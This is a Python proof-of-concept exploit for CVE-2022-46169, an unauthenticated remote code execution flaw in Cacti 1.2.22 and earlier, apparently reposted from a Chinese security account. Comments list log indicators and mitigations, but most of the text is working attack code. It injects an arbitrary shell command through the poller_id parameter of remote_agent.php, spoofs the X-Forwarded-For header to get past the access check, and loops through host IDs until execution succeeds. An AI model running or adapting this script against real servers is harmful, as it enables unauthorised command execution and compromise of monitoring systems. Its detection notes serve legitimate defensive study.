positional arguments:
target URL of the Cacti application.
optional arguments:
-f FILE File containing the command
-c CMD Command
--n_host_ids The range of host_ids to try (0 - n)
--n_local_data_ids The range of local_data_ids to try (0 - n)
"""Request loop from the public PoC for CVE-2022-46169 (Cacti <= 1.2.22).

What the script puts on the wire, which is also what a defender can look
for in web-server logs or WAF telemetry:

* unauthenticated GET requests to ``<target>/remote_agent.php``
* query parameters ``action=polldata``, an incrementing ``host_id``, a
  ``local_data_ids[]`` list, and a ``poller_id`` that is not a plain
  integer (it carries ``;`` and a ``/bin/sh -c "..."`` string)
* an ``X-Forwarded-For`` header set to the authority part of the target URL

Mitigation is outside this script: run a Cacti release newer than 1.2.22,
and do not let untrusted clients reach ``remote_agent.php`` or supply
forwarding headers that the application trusts.
"""
import argparse

import requests

cli = argparse.ArgumentParser(
    prog='Poc for CVE-2022-46169',
    description='Exploit Unauthenticated RCE on Cacti <= 1.2.22',
    epilog='Author: saspect',
)
cli.add_argument('target', help='URL of the Cacti application.')

# Exactly one of -f / -c must be given; argparse enforces this itself.
cmd_source = cli.add_mutually_exclusive_group(required=True)
cmd_source.add_argument(
    '-f',
    dest='file',
    type=argparse.FileType(),
    help='File containing the command',
)
cmd_source.add_argument('-c', dest='cmd', help='Command')

cli.add_argument(
    '--n_host_ids',
    dest='n_ids',
    type=int,
    default=100,
    help='The range of host_ids to try (0 - n)',
)
cli.add_argument(
    '--n_local_data_ids',
    dest='n_localids',
    type=int,
    default=50,
    help='The range of local_data_ids to try (0 - n)',
)
opts = cli.parse_args()

# argparse already rejects a missing -f/-c, so this guard only fires when
# -c was passed an empty string.
if not (opts.file or opts.cmd):
    cli.print_help()
    exit(1)

# -f: use the stripped file contents; -c: use the argument as given.
command = opts.file.read().strip() if opts.file else opts.cmd

# Value sent as poller_id. A legitimate poller_id is numeric, so any request
# whose poller_id contains shell metacharacters is a strong indicator.
injected_poller_id = f'; /bin/sh -c "{command}"'

data_ids = list(range(opts.n_localids))

# Third '/'-separated field of the target, i.e. host[:port] of a
# scheme://host[:port]/... URL. A target without a scheme raises IndexError.
forwarded_for = opts.target.split("/")[2]

# The endpoint does not change between attempts, so build it once.
endpoint = f'{opts.target}/remote_agent.php'
# Sent on every request; presumably this is what gets the request past the
# endpoint's client-address check on affected releases - confirm against
# the advisory for this CVE.
spoofed_headers = {'X-Forwarded-For': forwarded_for}

print(f"[*] Trying for 1 - {opts.n_ids} host ids")
for host_id in range(opts.n_ids):
    query = {
        'action': 'polldata',
        'host_id': host_id,
        'poller_id': injected_poller_id,
        'local_data_ids[]': data_ids,
    }
    response = requests.get(endpoint, params=query, headers=spoofed_headers)

    # The script takes 'cmd.php' appearing in the response body as its
    # success signal and stops at the first host_id that produces it.
    if 'cmd.php' in response.text:
        print(f"[+] Exploit Completed for host_id = {host_id}")
        break
原文始发于微信公众号(Khan安全攻防实验室):CVE-2022-46169 的 PoC – Cacti <= 1.2.22 上未经身份验证的 RCE